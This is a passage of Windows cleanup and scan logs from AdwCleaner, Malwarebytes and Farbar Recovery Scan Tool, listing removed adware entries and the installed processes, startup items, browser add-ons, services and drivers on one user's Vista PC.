File Deleted : C:\Windows\system32\drivers\netfilter.sys
File Deleted : C:\Users\Angel\Documents\ReimageRepair.exe
File Deleted : C:\Program Files\Mozilla Firefox\components\AskSearch.js
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\invalidprefs.js
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\user.js
 
***** [ Scheduled tasks ] *****
 
Task Deleted : LaunchSignup
Task Deleted : Reimage Reminder
Task Deleted : ReimageUpdater
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla
Key Deleted : HKLM\SOFTWARE\Classes\Conduit.Engine
Key Deleted : HKLM\SOFTWARE\Classes\speedupmypc
Key Deleted : HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Key Deleted : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Deleted : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Reimage.exe
Key Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT2418376
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9AFB8248-617F-460D-9366-D71CDEDA3179}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D52F7CE0-A4BA-4220-A907-444CB6158A09}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{5075DFCC-F3F5-4B15-B364-270BC7C585AD}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{895F78F3-9620-49AD-8AA8-E6802E5AC64E}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{0902EBD9-C5B4-4400-8CF1-7ACA8E8805D9}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EEE6C35D-6118-11DC-9C72-001320C79847}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}
Key Deleted : HKCU\Software\Driver Pro
Key Deleted : HKCU\Software\Fabulous
Key Deleted : HKCU\Software\GlobalUpdate
Key Deleted : HKCU\Software\PennyBee
Key Deleted : HKCU\Software\systweak
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\Reimage
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\SOFTWARE\systweak
Key Deleted : HKLM\SOFTWARE\TBID
Key Deleted : HKLM\SOFTWARE\Reimage
Key Deleted : HKLM\SOFTWARE\SPPDCOM
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Reimage Repair
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{10A0E600-D246-BD63-F465-4C849C688998}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}_is1
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{BC0BF363-63AB-4FF7-8EF1-AE0D7F711B24}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\conduitEngine
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\MyPC Backup
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\RocketTab
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\TVWizard
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\StormWatch
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Salus
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{37476589-E48E-439E-A706-56189E2ED4C4}_is1
Data Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\649A52D257CA5DB4EAAE8BA9EB23E467
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyServer] - hxxp=127.0.0.1:49172;hxxps=127.0.0.1:49172
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - <-loopback>;*.local
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v9.0.8112.16633
 
 
-\\ Mozilla Firefox v
 
 
-\\ Google Chrome v41.0.2272.118
 
 
*************************
 
AdwCleaner[R0].txt - [25555 bytes] - [02/04/2015 14:13:29]
AdwCleaner[R1].txt - [1312 bytes] - [02/04/2015 14:19:40]
AdwCleaner[R2].txt - [1430 bytes] - [02/04/2015 18:05:15]
AdwCleaner[S0].txt - [18594 bytes] - [02/04/2015 14:14:40]
AdwCleaner[S1].txt - [1098 bytes] - [02/04/2015 14:22:26]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [18713  bytes] ##########
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 4/13/2015
Scan Time: 2:49:32 PM
Logfile: Malware.txt
Administrator: Yes
 
Version: 2.01.4.1018
Malware Database: v2015.04.13.07
Rootkit Database: v2015.03.31.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows Vista Service Pack 2
CPU: x86
File System: NTFS
User: Angel
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 325116
Time Elapsed: 15 min, 13 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-04-2015
Ran by Angel (administrator) on ANGEL-PC on 13-04-2015 15:09:51
Running from C:\Users\Angel\Desktop
Loaded Profiles: Angel (Available profiles: Angel)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Andrea Electronics Corporation) C:\Windows\System32\AERTSrv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Teruten) C:\Windows\System32\FsUsbExService.Exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\Creativity Suite\Event Manager\EEventManager.exe
(Hewlett-Packard Company) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Hewlett-Packard) C:\Windows\System32\hphmon06.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
() C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Macrovision Corporation) C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
(Microsoft Corporation) C:\Program Files\Windows Live\Messenger\msnmsgr.exe
(Samsung Electronics Co., Ltd.) C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Hewlett-Packard Co.) C:\Program Files\HP\digital imaging\bin\hpqgalry.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [6265376 2008-08-19] (Realtek Semiconductor)
HKLM\...\Run: [IAAnotif] => C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe [182808 2008-07-20] (Intel Corporation)
HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128296 2008-05-23] (CyberLink Corp.)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [EEventManager] => C:\Program Files\EPSON\Creativity Suite\Event Manager\EEventManager.exe [102400 2005-04-08] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [HPHUPD06] => C:\Program Files\HP\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}\hphupd06.exe [49152 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [49152 2004-02-12] (Hewlett-Packard Company)
HKLM\...\Run: [HP Component Manager] => C:\Program Files\HP\hpcoretech\hpcmpmgr.exe [241664 2004-05-12] (Hewlett-Packard Company)
HKLM\...\Run: [HPHmon06] => C:\Windows\system32\hphmon06.exe [659456 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [NPSStartup] => [X]
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-01-20] (Apple Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [978520 2015-01-30] (Microsoft Corporation)
HKLM\...\Run: [SDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Run: [mgy0ntk1mjjizdb] => C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe [2391040 2015-02-15] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-07-08] (Apple Inc.)
Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X]
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ISUSPM] => C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe [218032 2006-09-11] (Macrovision Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3882312 2008-12-02] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [AutoStartNPSAgent] => C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe [95576 2010-07-04] (Samsung Electronics Co., Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [5529880 2015-03-13] (Piriform Ltd)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\WLXPGSS.SCR [307560 2008-12-04] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\digital imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Image Zone Fast Start.lnk
ShortcutTarget: HP Image Zone Fast Start.lnk -> C:\Program Files\HP\digital imaging\bin\hpqthb08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: No Name -> {1FD79A59-37B1-459B-9097-09F9FAB8A523} ->  No File
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF ProfilePath: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-04] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-02-21] ()
FF Plugin: @java.com/DTPlugin,version=10.5.1 -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\dtplugin\npDeployJava1.dll [2012-05-04] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-30] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @soe.sony.com/installer,version=1.0.3 -> C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{38AB6A6C-CC4C-4f9e-A3DD-3C5681EF18A1}\plugins\npsoe.dll No File
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Angel\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-10-17] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll [2007-04-10] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npCouponPrinter.dll [2008-06-18] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL [2006-10-26] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2014-05-08] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPTURNMED.dll [2009-03-11] (CNN)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np_gp.dll [2009-09-23] (NOS Microsystems Ltd.)
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\allrecipes.xml [2009-01-16]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\facebook.xml [2012-11-26]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\imdb.xml [2008-11-05]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\punditkitchennetwork.xml [2009-04-08]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\searchcanvas.xml [2014-08-09]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\aoiuyau@vbgdka.edu [2014-07-29]
FF Extension: FoxSaver - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\foxsaver@www.foxsaver.com [2011-08-29]
FF Extension: Move Media Player - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\moveplayer@movenetworks.com [2009-02-17]
FF Extension: Tab To Window - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\tabtowindow@sogame.cat [2009-06-15]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\yeeyiye@bffm.org [2014-08-09]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-05-01]
FF Extension: IE Tab - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{77b819fa-95ad-4f2c-ac7c-486b356188a9} [2013-06-07]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822} [2014-07-13]
FF Extension: Personas Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\personas@christopher.beard.xpi [2013-03-03]
FF Extension: Halloween - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{BB359C50-BFC9-4f40-8302-3FE5A499A859}.xpi [2012-05-07]
FF Extension: Adblock Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2012-05-07]
FF Extension: Red Cats (green flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{dd30bf68-268a-4815-ad48-8740b774c764}.xpi [2012-05-07]
FF Extension: Red Cats (blue flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{ff356687-aa08-463d-a46c-11c451824939}.xpi [2012-05-07]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-02-16]
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-02]
CHR Extension: (YouTube) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-16]
CHR Extension: (Adblock Plus) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-04-02]
CHR Extension: (Google Search) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-16]
CHR Extension: (Google Wallet) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-16]
CHR Extension: (Gmail) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-16]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AERTFilters; C:\Windows\system32\AERTSrv.exe [81920 2008-08-19] (Andrea Electronics Corporation)
S3 getPlusHelper; C:\Program Files\NOS\bin\getPlus_Helper.dll [51168 2009-09-23] (NOS Microsystems Ltd.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
S2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-03-17] (Malwarebytes Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22184 2015-01-30] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [284472 2015-01-30] (Microsoft Corporation)
S3 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.exe [65536 2004-03-18] (HP) [File not signed]
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [69632 2007-07-11] (MicroVision Development, Inc.) [File not signed]
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-20] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 FsUsbExDisk; C:\Windows\system32\FsUsbExDisk.SYS [36608 2010-06-14] () [File not signed]
S4 JRAID; C:\Windows\system32\drivers\jraid.sys [79960 2008-08-19] (JMicron Technology Corp.)
R3 KMWDFILTER; C:\Windows\System32\DRIVERS\KMWDFILTER.sys [17408 2008-10-09] (Windows ® Codename Longhorn DDK provider)
